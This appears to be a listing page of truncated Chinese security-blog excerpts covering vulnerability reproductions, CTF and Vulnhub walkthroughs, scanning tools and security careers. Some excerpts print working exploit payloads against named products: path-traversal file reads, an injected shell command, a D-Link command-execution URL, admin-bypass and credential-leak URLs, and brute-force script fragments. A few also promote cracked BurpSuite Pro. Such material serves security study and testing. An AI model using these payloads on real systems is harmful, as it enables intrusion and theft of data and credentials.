也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

Vulnhub内网渗透DC-7靶场通关

个人博客: xzajyjs.cn DC系列共9个靶场，本次来试玩一下一个 DC-7，下载地址。下载下来后是 .ova 格式，建议使用vitualbox进行搭建，vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式，桥接模式可能会造成目标过多不…

原创先锋后台管理平台未授权访问

漏洞描述原创先锋后台管理平台存在未授权访问漏洞，攻击者通过漏洞可以任意接管账户权限漏洞复现访问未授权的url： /admin/admin/admin_list.html漏洞证明如下： 文笔生疏，措辞浅薄，望各位大佬不吝赐教&#xff0…

反制Goby扫描之XSS点击上线

反制Goby扫描之XSS点击上线1.测试环境2.XSS测试3.CS上线最近看到有大佬利用goby漏洞反制攻击者，特意复现下，原理就是通过XSS进行交互，调用Node.js函数exec执行命令，最新版本已经进行了修复，如果还在使用低版本还是尽快…

CVE-2020-13942 （Apache Unomi 远程代码执行漏洞复现）

一、漏洞描述 Apache Unomi 是一个基于标准的客户数据平台（CDP，Customer Data Platform），用于管理在线客户和访客等信息，以提供符合访客隐私规则的个性化体验，比如 GDPR 和“不跟踪”偏好设置。其最初于 J…

sql注入(7), python 实现盲注爆破数据库名, 表名, 列名

python 实现盲注该python脚本根据之前介绍的盲注原理实现, 对于发送的注入请求没有做等待间隔, 可能给目标服务器造成一定压力, 所以仅限于本地测试使用. import requests, time# 时间型盲注 def time_blind(base_url, cookie):for length in range(1, 20): # 测试数据库名…

网络安全（黑客）自学方向

每年报考网络安全专业的人数很多，但不少同学听说千万别学网络安全，害怕网络安全专业很难就业。下面就带大家深入了解一下网络安全专业毕业后可以干什么，包括网络安全专业的就业前景和方向等。随着信息化时代的到来，网络安全行业…

XSS攻击(4), XSS扫描工具

XSSTrike 与 Burp Suite 扫描 XSS 漏洞一, XSSTrike 1. 安装下载: https://github.com/s0md3v/XSStrike/releases 安装依赖: pip install tld, fuzzywuzzy, requests官方文档: https://github.com/s0md3v/XSStrike/wiki/Usage#scan-a-single-url 2. 使用测试get请求 O…

MS12_020 3389远程溢出漏洞

1.search ms12_020 搜索ms12_020 2.use auxiliary/scanner/rdp/ms12_020_check 检查是否存在ms12_020漏洞 show options 查看所需参数 set RHOSTS x.x.x.x 设置目标IP地址 run 执行检测出来有Ms12_020漏洞 3.use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 选择…

ToBeWritten之ATTCK 场景实践

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞

与齐治堡垒机出现的漏洞不能说毫不相关，只能说一模一样 POC验证的url为： /audit/gui_detail_view.php?token1&id%5C&uid%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&loginadmin成功获取admin权限文笔生疏…

ToBeWritten之威胁狩猎

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

SQL注入 - 宽字节注入

文章目录 SQL注入 - 宽字节注入宽字节注入前置知识宽字节靶场实战判断是否存在SQL注入判断位数判显错位判库名判表名判列名 SQL注入 - 宽字节注入靶场 sqli - labs less-32 宽字节注入主要是绕过魔术引号的，数据库解析中除了UTF-8编码外的所有编码如：G…

【漏洞复现】EnjoySCM存在文件上传漏洞

漏洞描述 EnjoySCM是一款适应于零售企业的供应链管理软件，主要为零售企业的供应商提供服务。EnjoySCM的目的是通过信息技术，实现供应商和零售企业的快速、高效、准确的信息沟通、管理信息交流。。该系统存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器的敏感信息。 …

零基础自学网络安全，就是这样简单！

建议一：黑客七个等级黑客，对很多人来说充满诱惑力。很多人可以发现这门领域如同任何一门领域，越深入越敬畏，知识如海洋，黑客也存在一些等级，参考知道创宇 CEO ic（世界顶级黑客团队 0x557 成员…

红队打靶：ConnectTheDots打靶思路详解（vulnhub）

目录写在开头第一步：主机发现和端口扫描第二步：FTP和NFS渗透（失败） 第三步：web渗透第四步：jsfuck解码第五步：再次FTP渗透与莫尔斯电码解码第六步：vim读取断电swp文件…

crAPI靶场学习记录

靶场搭建 [靶场下载地址](我fork了一份) docker安装，笔者是用的wsldocker. [lab0:**初始账户 **] 1. 注册一个账户，邮箱为[APIqq.com]，密码为Admin123 1. 登陆后访问对应IP的8025端口，接收邮件获取车辆信息。 [lab1:**访问其…

红队技术笔记

笔记下载： 红队技术笔记https://mp.weixin.qq.com/s/DqeaXUZYYIYJ8FVtTV07pw

nikto工具的用法描述（漏洞分析）

声明：本文仅做学习与交流，在此记录方便日后查看；同时希望也能帮助到正在看这篇文章的你。目录 1、nikto简介 2、nikto特征 3、nikto帮助 4、nikto实战 4.1 扫描多个地址

ToBeWritten之攻击者模拟

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

面经分享 | 某康安全开发工程师

本文由掌控安全学院 - sbhglqy 投稿一、反射型XSS跟DOM型XSS的最大区别 DOM型xss和别的xss最大的区别就是它不经过服务器，仅仅是通过网页本身的JavaScript进行渲染触发的。二、Oracle数据库了解多吗平常用的多的是MySQL数据库，像Oracle数据库也有…

渗透测试——信息收集思路

文章目录信息收集域名与 IPOSINTCDNCDN的作用如何检测是否存在CDN CDN 绕过多地Ping邮件服务器子域名真实IP寻找国外地址请求查找老域名查找关联域名信息泄露/配置文件网站漏洞DNS记录，证书域名历史搜索引擎语法WHOIS端口对外开放情况Nmap 网站的三种部署模式网站…

python 使用 scapy 扫描内网IP或端口

地址信息在IP层, 可以利用 ICMP 或 ARP 协议数据包探测IP信息. ICMP协议可以利用ping工具发送数据包, 但是防火墙有可能禁止ICMP, 无法有效探测, 可以考虑使用ARP探测. 利用ICMP协议探测内网IP def ping_ip(ip_fex):# 扫描范围: 128~254for i in range(128, 255):ip f{ip_fe…

nmap 扫描内网IP, 系统, 端口

nmap 扫描内网IP, 系统, 端口扫描内网ip 对内网进行ARP扫描 .\nmap.exe -sn 192.168.110.0/24 # 全网段 .\nmap.exe -sn 192.168.110.100-200 # 100-200范围扫描端口 .\nmap.exe -sT 192.168.110.130 # 三次握手连接较慢, 但更有效 .\nmap.exe -sS 192.168.110.130 # 发…

H3C IMC dynamiccontent.properties.xhtm 远程命令执行

我举手向苍穹，并非一定要摘星取月，我只是需要这个向上的、永不臣服的姿态。构造payload： /imc/javax.faces.resource/dynamiccontent.properties.xhtml pfdrtsc&lnprimefaces&pfdriduMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbii…

【漏洞复现】金和OA FileUploadMessage 文件读取

漏洞描述金和OA系统存在任意文件读取漏洞，攻击者通过恶意构造的请求下载服务器上的任意文件，包括敏感文件、配置文件、数据库文件等。这种漏洞通常存在于Web应用程序中，是由于不正确的输入验证或不安全的文件处理机制导致的。免责声明技术文章仅供参考，任何个人和组织…

红队打靶：Misdirection打靶思路详解（vulnhub）

目录写在开头第一步：主机发现与端口扫描第二步：Web渗透（80端口，战术放弃） 第三步：Web渗透（8080端口） 第四步：sudo bash提权第五步：/etc/passwd利…

【漏洞复现】蓝凌EIS智慧协同平台任意文件上传

目录蓝凌智慧协同平台介绍漏洞搜索漏洞点漏洞复现 nuclei poc 验证漏洞修复蓝凌智慧协同平台介绍蓝凌智慧协同平台是个自动化办公OA，具有多端同步、无缝协作,提供移动端（蓝凌KK、阿里钉钉、微信企业号）、桌面端、网页端多端应…

红队打靶：Narak打靶思路详解（vulnhub）

目录写在开头第一步：主机发现与端口扫描第二步：Web渗透第三步：tftp渗透第四步：webdav利用第五步：寻找敏感文件初步提权第六步：motd利用提权总结与思考写在开头本篇博客在自己的理解之上…

【漏洞复现】冰峰VPN存在敏感信息泄露漏洞

漏洞描述冰峰VPN log/system.log模块日志信息泄露漏洞免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利…

文件上传漏洞(1), 文件上传绕过原理

文件上传漏洞一, 前端校验上传文件添加 Javascript 代码，然后在 form 表单中添加 onsubmit"returb checkFile()" <script>function checkFile() {// var file document.getElementsByName(photo)[0].value;var file document.getElementByI…

文件上传漏洞(2), 文件上传实战绕过思路, 基础篇

文件上传漏洞实战思路(基础) 准备一句话木马文件 mm.php 一, 前端绕过 p1 浏览器禁用js先把mm.php后缀名修改为mm.jpg, 点击提交后, 用 burp 截取请求, 将数据包中的文件名修改回mm.php再提交. 二, 类型MIME绕过 p2 使用 burp 修改 Content-Type: image/jpeg 三, 黑名单绕…

锐捷smartWeb管理系统存在逻辑缺陷漏洞

通过弱口令进行登录 guest/guest 通过低权限用户构造payload： /web/xml/webuser-auth.xml访问漏洞url，直接获得所有账户的等级标志和base64加密的账号密码，解秘后即可登录后台解密管理员的账号密码成功登录文笔生疏，措辞浅…

锐捷RG-UAC账号密码信息泄露

第一种方法： 构造如下Payloads https://xxxxx/get_dkey.php?useradmin访问payload成功后，可以看到受影响系统的超级管理员权限账号、访客权限账号、审计权限账号的账户名和 MD5 加密的密码值，如下图所示： 下面可以使用上一步查…

代码审计-锐捷EG易网关 download.php 后台任意文件读取漏洞

首先登录到后台中(可以组合锐捷EG易网关管理员账号密码泄露漏洞) 关键部分代码为直接从Get请求中提取 file参数读取文件，可以使用 …/ 跳转目录验证POC /download.php?aread_txt&file../../../../etc/passwd漏洞证明： 文笔生疏，…

代码审计-锐捷EG易网关管理员账号密码泄露漏洞

出现漏洞的文件在 /login.php 审查源码我们发现通过命令拼接的方式构造命令执行发送请求包，拼接 CLI指令 show webmaster user /login.php usernameadmin&passwordadmin?showwebmasteruser漏洞证明： 文笔生疏，措辞浅薄，望…

获取服务器或域控登录日志工具

SharpUserIP 功能简介服务器登陆日志 (需管理员权限) 在域控或远程提取登录日志，快速获取域用户对应的 IP 地址项目地址：https://github.com/lele8/SharpUserIP 使用说明 ___ _ _ _ ___ ___/ __| |_ __ _ _ _ _ _…

在安装和配置DVWA渗透测试环境遇到的报错问题

安装环境前面的安装我参考的这个博主：渗透测试漏洞平台DVWA环境安装搭建及初级SQL注入-CSDN博客修改bug 1.首先十分感谢提供帮助的博主，搭建DVWA Web渗透测试靶场_dvwa 白屏-CSDN博客，解决了我大多数问题，报错如下&#xff1…

文件类漏洞总结, 文件包含, 文件上传, 文件下载

文件类漏洞总结一, 文件包含 1. 文件包含绕过实际环境中不是都是像$_GET[file]; incude $file 这样直接把变量传入包含函数的。在很多时候包含的变量文件不是完全可控的，比如下面这段代码指定了前缀和后缀: <?php $file S_GET[filename]; include /opt/…

文件下载漏洞, 漏洞原理, 测试方法, 漏洞防御, 常见敏感路径

文件下载漏洞一, 文件下载漏洞原理利用条件: 1. 读取文件的路径是用户可控, 且没有校验或检验不严. 2. 使用了读取文件的函数. 3. 输出了文件内容.漏洞场景一: 后端没有限制哪些路径的文件可以下载后端代码: http://192.168.112.200/security/download.php $file_pat…

【漏洞复现】DocCMS keyword SQL注入漏洞

漏洞描述 DocCms[音译：稻壳Cms] ，定位于为企业、站长、开发者、网络公司、VI策划设计公司、SEO推广营销公司、网站初学者等用户量身打造的一款全新企业建站、内容管理系统，服务于企业品牌信息化建设，也适应用个人、门户网站建设！Doccms存在SQL注入漏洞，攻击者可利用漏洞…

python工具三星路由器远程命令执行漏洞

无人扶我青云志，我自踏雪至山巅；倘若命中无此运，孤身亦可登昆仑 python工具漏洞证明： 文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免责声明：由于传播或利用此文所提供的…

AD CS证书攻击与防御:ESC1

简介 2021年的BlackHat大会上，Will Schroeder和Lee Christensen发布了关于Active Directory Certificate Services 利用白皮书《Certified Pre-Owned - Abusing Active Directory Certificate Services》。攻击对象为AD CS，攻击手法主要是利用证书模版…

XXE XML外部实体注入

XXE 外部实体注入一, 简介 XXE（XML External Entity Injection）是一种 XML 注入攻击，它利用了 XML 解析器在处理 XML 文档时存在的漏洞。攻击者通过在 XML 文档中插入外部实体的引用，可以引导 XML 解析器读取攻击者控制的外部…

HIKVISION流媒体管理服务器后台任意文件读取漏洞

默认账号密码为 admin/12345 构造payload /systemLog/downFile.php?fileName../../../../../../../../../../../../../../../windows/system.ini漏洞证明文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免责声明：由于传播…

python工具网康下一代防火墙RCE

python漏洞利用构造payload POST /directdata/direct/router HTTP/1.1{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/htm…

Zyxel NBG2105 身份验证绕过

直接访问如下payload则会以管理员身份跳转到 home.htm页面 /login_ok.htm漏洞证明查看本页面的cookie，login为1 文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免责声明：由于传播或利用此文所提供的信息、…

一款快速从数据库中提取信息工具

DataMiner 介绍 DataMiner是一款数据库自动抽取工具，用于快速从数据库中提取信息，目前支持 mysql、mssql、oracle、mongodb等数据库，可导出CSV、HTML。功能支持对所有数据库数据进行采样，并指定采样数量。支持对指定数据库…

【漏洞复现】OneThink前台注入漏洞

漏洞描述 OneThink 是一个基于 PHP 的开源内容管理框架，旨在简化和加速Web应用程序的开发过程。它提供了一系列通用的模块和功能，使开发者能够更轻松地构建具有灵活性和可扩展性的内容管理系统（CMS）和其他Web应用。免责声明 …

【MySql密码爆破脚本】用于其他爆破工具无法使用的情况下

1、脚本 #!/bin/bash# 脚本参数 username$1 # MySQL用户（或字典路径） password$2 # MySQL密码（或字典路径） task_num${3:-32} # 并发数，默认 32# 检查参数是否存在 if [ -z "$username" ] || [ -z "…

红队攻防实战之内网穿透隐秘隧道搭建

别低头，皇冠会掉；别流泪，贱人会笑。本文首发于先知社区，原创作者即是本人 0x00 前言构建内网隐蔽通道，从而突破各种安全策略限制，实现对目标服务器的完美控制。当我们从外网成功获得攻击点的时候&…

红队攻防实战系列一之metasploit

百目无她，百书质华，君当醒悟，建我中华本文首发于先知社区，原创作者即是本人前言在红队攻防中，我们主要在外网进行信息收集，通过cms或者其他漏洞拿到shell，之后通过免杀木马将windows或lin…

Metasploit框架(1), 简介, 主要模块, 目录, 基本命令, 入侵案例

Metasploit框架(1), 简介, 主要模块, 目录, 基本命令, 入侵案例 Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情…

NMap扫描进阶

NMap扫描进阶一, 基础扫描扫描IP地址: nmap -sn 192.168.112.0/24 192.168.112.1-255扫描端口号: 基于SYN包扫描: nmap -sS 192.168.112.200 基于三次握手扫描: nmap -sT 192.168.112.200指定端口扫描: nmap -p10-200 192.168.112.200 nmap -p21,22,25,80,445,3306,1521…

【漏洞复现】通达OA inc/package/down.php接口存在未授权访问漏洞附POC

漏洞描述通达OA（Office Anywhere网络智能办公系统）是由通达信科科技自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、…

红队攻防实战之某商城Getshell

此后如竟没有炬火，我便是唯一的光信息收集端口扫描 nmap -T4 -A -p 1-65535 可以看到目标系统开放22、80、888、3306、8800端口敏感文件扫描 http:///admin/login.html 后台登陆地址泄露漏洞挖掘 phpinfo信息泄露 phpinfo信息泄露，此站为Linu…

木马与免杀(2), msfvenom 工具, shellcode代码, shellcode加载器

木马与免杀(2), msfvenom 工具, shellcode代码, shellcode加载器 Shellcode是一段用于利用软件漏洞而执行的代码，通常以16进制机器码形式编写，因为它经常让攻击者获得shell的名称[1]。Shellcode的主要目的是让攻击者的恶意代码在受害者的计算机上执行&a…

pwn入门：基本栈溢出之ret2libc详解（以32位+64位程序为例）

目录写在开头题目简介解题思路前置知识（简要了解） plt表和got表延迟绑定例题详解 32位 64位总结与思考写在开头这篇博客早就想写了，但由于近期事情较多，一直懒得动笔。近期被领导派去临时给合作单位当讲师&a…

Linux横向移动

Linux横向移动主机存活探测 shell for i in 192.168.111.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done 或者 for k in $( seq 1 255);do ping -c 1 192.168.1.$k|grep "ttl"|awk -F "[ :]" {print $4}; d…

Web信息收集，互联网上的裸奔者

Web信息收集，互联网上的裸奔者 1.资产信息收集2.域名信息收集3.子域名收集4.单点初步信息收集网站指纹识别服务器类型(Linux/Windows)网站容器(Apache/Nginx/Tomcat/IIS)脚本类型(PHP/JSP/ASP/ASPX)数据库类型(MySQL/Oracle/Accees/SqlServer) 5.单点深入信息收集截…

大师计划1.0 - log2 CRTO笔记

CRTOⅠ笔记 log2 这个笔记是我在2023年11月23日-12月22日中，学习CRTO所做的一些笔记。事实上TryHackMe的路径和htb学院包含了许多CRTO的知识并且甚至还超出了CRTO（CS除外），所以很多东西在THM和htb学院学过，这次CRTO等…

域渗透之影子凭证滥用密钥信任账户映射进行账户接管

关注公众号回复20231110获取最新网络安全以及内网渗透等资料。什么是 PKINIT？ 在 Kerberos 身份验证中，客户端必须在 KDC为其提供票证授予票证 (TGT) 之前执行“预验证”，该票证随后可用于获取服务票证。预认证的原因是，没有它&…

搭建Tomcat调试环境并分析CVE-2017-12615

准备下载存在漏洞版本tomcat，这里下的是8.0.45 https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.45/ 可执行文件和源码都需要下载用idea打开源码文件，然后将java目录设置为源码目录配置一下jdk 转成maven项目添加一些依赖 <dependencie…

关于Mybatis的一个小问题

之前在挖一些项目的时候，老是遇到参数置空导致信息泄露的问题。为了一探究竟，我又去重新补了一下Mybatis 也算是水一篇文章了。 Mybatis中XML中的SQL规范可能产生的信息泄露如果在Mybatis中的XML文件中如果是这么写的话。 <select id"queryB…

一款批量Linux应急响应检查工具

fireman简介 fireman用于在维护多台服务器并且需要定时检查服务器状态的场景下。使用自带命令可一键获取相关资源信息，排查服务器是否存在可疑用户、非法外连、文件更改等高危事件。使用 res模块用于管理资源信息添加资源编辑资源信息编写Source.yaml文件…

vulnhub-Tre(cms渗透)

靶机和kali都使用net网络，方便探测主机获取ip1.靶机探测使用fping扫描net网段靶机ip：192.168.66.130 2.端口扫描扫描发现该靶机三个端口，ssh，还有两个web，使用的中间件也是不一样的，一个是apache&…

【Java代码审计】RCE篇

【Java代码审计】RCE篇 1.Java中的RCE2.ProcessBuilder命令执行漏洞3.Runtime exec命令执行漏洞4.脚本引擎代码注入5.RCE的防御 1.Java中的RCE 在PHP开发语言中有system()、exec()、shell_exec()、eval()、passthru()等函数可以执行系统命令。在Java开发语言中可以执行系统命令…

【Java代码审计】URL跳转漏洞篇

【Java代码审计】URL跳转漏洞篇 1.URL跳转漏洞概述2.Java中的URL重定向3.URL跳转漏洞修复 1.URL跳转漏洞概述通俗地说，目前很多的Web应用因为业务需要，需与内部的其他服务或者第三方的服务进行交互，这样就需要重定向的功能，由当…

BurpSuite Professional版本破解流程

前言很多测试领域的小伙伴在渗透测试中会选择BurpSuite这一类型的全能型选手，但又由于BurpSuite社区版有很多功能限制导致在实际中的一些渗透测试操作无法进行（例如社区版本的插件是需要专业版才有权限进行安装使用的），所以就导致…

使用SecScanC2构建P2P去中心化网络实现反溯源

个人博客: xzajyjs.cn 前言这款工具是为了帮助安全研究人员在渗透测试过程中防止扫描被封禁、保护自己免溯源的一种新思路。其利用到了区块链中的p2p点对点去中心化技术构建以来构建代理池。工具链接：https://github.com/xzajyjs/SecScanC2 实验过程该工具分为…

CVE-2022-22965 Spring Framework远程命令执行

0x01 影响版本 Spring Framework < 5.3.18 Spring Framework < 5.2.20 JDK>9 0x02 复现环境 vulhub/spring/cve-2022-22965 0x03 漏洞复现首先docker-compose up -d开启靶场输入payload <%if("j".equals(request.getParameter("pwd")…

Web安全漏洞专项靶场—SQL注入—docker环境—sqli-labs靶场—详细通关指南

SQL注入—sqli-labs靶场零、前言一、环境搭建①、VirtualBox②、Kali Linux③、Docker 二、闯关开始1、Less-1——union2、Less-2—数字型—union3、Less-3—)—union4、Less-4—")—union5、Less-5——布尔盲注6、Less-6—"—布尔盲注7、Less-7—))7.1—布尔盲注7.…

BurpSuite Pro 2023.12.1.2下载与破解-最新版BurpSuite Pro

本文在我的博客地址是：https://h4cker.zip/post/f05ae2e66da503f6383dffe48cdf5bac 上一次BurpSuite的分享还是在2020年由于CSDN有防盗链，我自己的博客都无法访问这篇博文的图片了至于为什么再写一次，是因为我看到群里这张图：…

D-link未授权访问以及远程代码执行

随便输入一个错误密码，会跳转到页面： /page/login/login.html?errorfail继续访问有效页面漏洞url： /Admin.shtml然后访问管理页面去更改管理密码直接构造payload访问漏洞url： /cgi-bin/execute_cmd.cgi?cmdid执行命令&#…

汽车网络安全渗透测试概述

目录 1.汽车网络安全法规概述 1.1 国外标准 1.2 国内标准 2.汽车网络安全威胁分析 2.1 汽车网络安全资产定义 2.2 汽车网络安全影响场景及评级示例 3.汽车网络安全渗透测试描述 3.1 参考法规 3.2 渗透测试内容 4.小结 1.汽车网络安全法规概述近年来，汽车…

华东理工大学漏洞报送证书

获取来源：edusrc（教育漏洞报告平台） url：主页 | 教育漏洞报告平台兑换价格：20金币获取条件：提交华东理工大学任意中危或以上级别漏洞证书规格：附送图二实物及封皮

红队攻防实战之DC2

吾愿效法古圣先贤，使成千上万的巧儿都能在21世纪的中华盛世里，丰衣足食，怡然自得 0x01 信息收集: 1.1 端口探测使用nmap工具可以发现开放了80端口，网页服务器但是可以看出做了域名解析，所以需要在本地完成本地域名…

24个已知403绕过方法的利用脚本

介绍一个简单的脚本，仅供自用，用于绕过 403 在curl的帮助下使用24个已知的403绕过方法它还可用于比较各种条件下的响应，如下图所示用法 ./bypass-403.sh https://example.com admin ./bypass-403.sh website-here path-here 安装 git …

跨站请求伪造 CSRF 漏洞原理以及修复方法

漏洞名称：跨站请求伪造（CSRF） 漏洞描述： 跨站请求伪造攻击，Cross-Site Request Forgery（CSRF），攻击者在用户浏览网页时，利用页面元素（例如img的src&#xf…

100条安全原则来制定安全策略

100条安全原则来制定安全策略最小化原则，网络最小化，权限最小化，能看到的资源最小化，应用最小化等等隐藏原则，一切都对黑客隐藏就可以了； 二次验证，还要经常改密码； 打补丁&…

一键打造属于自己漏扫系统

0x01 工具介绍本系统是对Web中间件和Web框架进行自动化渗透的一个系统,根据扫描选项去自动化收集资产,然后进行POC扫描,POC扫描时会根据指纹选择POC插件去扫描,POC插件扫描用异步方式扫描.前端采用vue技术,后端采用python fastapi。 0x02 安装与使用 1、Docker部署环境编译…

为啥网络安全那么缺人，但很多人却找不到工作？

文章目录一、学校的偏向于学术二、学的东西太基础三、不上班行不行为什么网络安全的人才缺口那么大，但是大学毕业能找到网安工作的人却很少，就连招聘都没有其他岗位多？ 明明央视都说了网络安全的人才缺口还有300多万，现在找不到…

网络安全的新防线：主动进攻，预防为先

进攻性安全（Offensive security）是指一系列主动安全策略，这些策略与恶意行为者在现实世界的攻击中使用的策略相同，区别在于其目的是加强而非损害网络安全。常见的进攻性安全方法包括红队、渗透测试和漏洞评估。进攻性安全行动通常…

SQL-Labs靶场“11-15”关通关教程

君衍. 一、十一关基于POST单引号字符型注入1、源码分析2、联合查询注入3、报错注入二、十二关基于POST双引号字符型注入1、源码分析2、联合查询注入3、报错注入三、十三关基于POST单引号报错注入变形1、源码分析2、报错注入四、十四关基于POST双引号报错注入1、源码分析…

爬虫字典生成工具，CeWL使用教程

爬虫字典生成工具，CeWL使用教程 1.工具概述2.参数解析3.使用实例1.工具概述 CeWL 是一个 ruby 应用程序，它将给定的 URL 爬到指定的深度，可以选择跟随外部链接，并返回一个单词列表，然后可用于密码破解者 Cewl 是黑客武器库中的强大工具，因为它允许创建有针对性的单词列…

SQL-Labs靶场“46-50”关通关教程

君衍. 一、四十六关 ORDER BY数字型注入1、源码分析2、rand()盲注3、if语句盲注4、时间盲注5、报错注入6、Limit注入二、四十七关 ORDER BY单引号报错注入1、源码分析2、报错注入3、时间盲注三、四十八关 ODRER BY数字型盲注1、源码分析2、rand()盲注3、if语句盲注4、时间盲注…

OSCP靶场--Slort

OSCP靶场–Slort 考点(1.php 远程文件包含 2.定时任务提权) 1.nmap扫描 ┌──(root㉿kali)-[~/Desktop] └─# nmap 192.168.178.53 -sV -sC -p- --min-rate 5000 Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-24 04:37 EST Nmap scan report for 192.168.178.53 …

WEB漏洞 XSS分析简单实践

一、介绍简介 XSS全称是Cross Site Scripting即跨站脚本，为了不和层叠样式表(Cascading Style Sheets)的缩写CSS混合，所以改名为XSS； 攻击者会向web页面(input表单、URL、留言版等位置)插入恶意JavaScript代码，导致管理员/用户…

OSCP靶场--Squid

OSCP靶场–Squid 考点(1.squid代理绕过 2.phpmyadmin写webshell 3.受限服务账户【LOCAL SERVICE或NETWORK SERVICE】恢复特权 4.SeImpersonatePrivilege提权) 1.nmap扫描 ## ┌──(root㉿kali)-[~/Desktop] └─# nmap -sV -sC -p- 192.168.188.189 --min-rate 2000 Starti…

【漏洞复现】Hikvision SPON IP网络对讲广播系统任意文件上传

漏洞描述 IP网络对讲广播系统是一种基于IP网络的高效、可靠、智能的通信解决方案。它支持全双工语音通信、单呼/多呼、组呼/广播等多种通信模式，可以实现跨地域、跨网络的实时通讯。该系统具有灵活的群组管理、智能化的调度和优先级控制功能，可以满足各种场景下的紧急通讯和…

【暗月安全】2021年渗透测试全套培训视频

参与培训需要遵守国家法律法规，相关知识只做技术研究，请勿用于违法用途，造成任何后果自负与本人无关。中华人民共和国网络安全法（2017 年 6 月 1 日起施行） 第二十二条任何个人和组织不得从事入侵他人网络、干扰他…

鱼哥赠书活动第⑥期：《内网渗透实战攻略》看完这本书教你玩转内网渗透测试成为实战高手！！！！

鱼哥赠书活动第⑥期：《内网渗透实战攻略》如何阅读本书：本书章节介绍：本书大致目录：适合阅读对象：赠书抽奖规则:往期赠书福利： 当今，网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中&…

Goby高级食用指南

Goby高级食用指南 1.Goby POC2.自定义字典3.Goby插件生态 - 一些好用的插件分享FOFASubDomainsBruteExportCsvAWVSRedis-cliGoby4waf初级篇参考 - Goby基本使用 1.Goby POC Goby的漏洞模块包含官方自定义的一些初始POC：红队版的POC会实时更新，普通版则不会 Goby的POC编写…

【漏洞复现】傲盾信息安全管理系统前台 sichuan_login 远程命令执行

漏洞描述傲盾信息安全管理系统前台 sichuan_login 接口存在远程命令执行漏洞免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算…

【漏洞复现】先锋WEB燃气收费系统文件上传漏洞 1day

漏洞描述 /AjaxService/Upload.aspx 存在任意文件上传漏洞免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作…

【漏洞复现】Office365-Indexs-任意文件读取

漏洞描述 Office 365 Indexs接口存在一个任意文件读取漏洞，攻击者可以通过构造精心设计的请求，成功利用漏洞读取服务器上的任意文件，包括敏感系统文件和应用程序配置文件等。通过利用此漏洞，攻击者可能获得系统内的敏感信息，导致潜在的信息泄露风险免责声明技术文章…

2024年最全的白帽黑客学习教程，从0到高手，建议收藏

新手如何通过自学黑客技术成为厉害的白帽黑客？ 我目前虽然算不上顶尖的白帽大佬，但自己在补天挖漏洞也能搞个1万多块钱。给大家分享一下我的学习方法，0基础也能上手学习,如果你能坚持学完，你也能成为厉害的白帽子！ 文…

ctfshow反序列化(web254-web266)

目录 web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web254 源码 <?php/* # -*- coding: utf-8 -*- # Author: h1xa # Date: 2020-12-02 17:44:47 # Last Modified by: h1xa # Last Modified time: 2020…

2024自学网络安全（黑客）

网络安全涉及攻击和防御两个方面，通常以“红队”、“渗透测试”为攻击视角，以“蓝队”、“安全运营”、“安全运维”为防御视角。在网络安全市场，需求量大且发展相对成熟，入门相对容易。网络安全建立在其他技术基础之上&#xf…

ctfshow-命令执行(web53-web72)

目录 web53 web54 web55 web56 web57 web58 web59 web60 web61 web62 web63 web64 web65 web66 web67 web68 web69 web70 web71 web72 web53 …

实战：加密传输数据解密

前言下面将分享一些实际的渗透测试经验，帮助你应对在测试中遇到的数据包内容加密的情况。我们将以实战为主，技巧为辅，进入逆向的大门。技巧开局先讲一下技巧，掌握好了技巧，方便逆向的时候可以更加快速的找到关键…

sqli-lbs靶场搭建

目录环境小皮源码下载 1.源码解压： 2.搭建网站 2.1点击创建网站 2.2修改sql-connections\db-creds.inc 2.3重新启动 3.访问你设置的域名 3.1点击启动数据库配置 3.2返回第一个页面（开启题目） sqlilbs靶场搭建环境小皮源码下载下载地址&am…

Apache Commons Collection3.2.1反序列化分析(CC1)

Commons Collections简介 Commons Collections是Apache软件基金会的一个开源项目，它提供了一组可复用的数据结构和算法的实现，旨在扩展和增强Java集合框架，以便更好地满足不同类型应用的需求。该项目包含了多种不同类型的集合类、迭代器、队…

phpMyAdmin 未授权Getshell

